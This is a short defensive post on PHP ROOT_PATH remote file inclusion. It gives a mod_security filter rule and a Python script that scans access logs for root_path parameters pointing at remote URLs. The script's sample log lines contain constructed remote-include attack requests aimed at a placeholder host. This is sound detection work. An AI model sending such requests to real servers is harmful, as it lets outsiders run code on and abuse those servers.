ROOT_PATH vulnerabilities.

In PHP there is a vulnerability involving the ROOT_PATH include. Through poor coding, it basically allows a well-constructed query string to pass a file from a remote server to PHP, which then executes the code. As an example, the included file could be used to send spam or phishing email by routing it internally through your server via the PHP code.

One easy way to deal with this vulnerability is to run modsecurity with a filtering option.

All on one line:
SecFilterSelective REQUEST_URI "root_path=(http|https|ftp)\:/"

For more information, http://www.modsecurity.org/ is a great site with links to more examples of rules you can run to help account for bad programming and unpatched packages.
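To check whether such requests have already reached a server, the same pattern can be run over the web server's access log. The script below is an added example, not part of the original post; the log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Same test as the filter above: the value starts with a remote scheme.
REMOTE = re.compile(r"^(https?|ftp):/", re.IGNORECASE)
# Request line inside a common/combined format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2007:10:00:05 +0000] "GET /inc/db.php?root_path=http://files.example.invalid/a.txt? HTTP/1.1" 200 80',
    '192.0.2.45 - - [01/Jan/2007:10:00:09 +0000] "GET /inc/db.php?phpbb_root_path=FTP%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.0" 200 80',
    '192.0.2.11 - - [01/Jan/2007:10:00:12 +0000] "GET /inc/db.php?root_path=./ HTTP/1.1" 200 80',
]

def remote_root_path(uri):
    """Return the remote URL passed in a *root_path parameter, or None."""
    query = uri.partition("?")[2]
    # parse_qsl percent-decodes names and values, so encoded forms
    # such as http%3A%2F%2F are compared in their decoded form.
    for name, value in parse_qsl(query, keep_blank_values=True):
        # The filter's pattern is unanchored, so it also matches parameter
        # names that merely end in "root_path"; do the same here.
        if name.lower().endswith("root_path") and REMOTE.match(value.strip()):
            return value.strip()
    return None

def scan(lines):
    """Return (client_ip, remote_url) for every matching log entry."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = remote_root_path(m.group(1))
        if target:
            hits.append((line.split()[0], target))
    return hits

if __name__ == "__main__":
    for ip, url in scan(SAMPLE_LOG):
        print(ip, url)
```

Any hit on a real log is worth following up by checking what the named script does with the parameter before it reaches an include.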
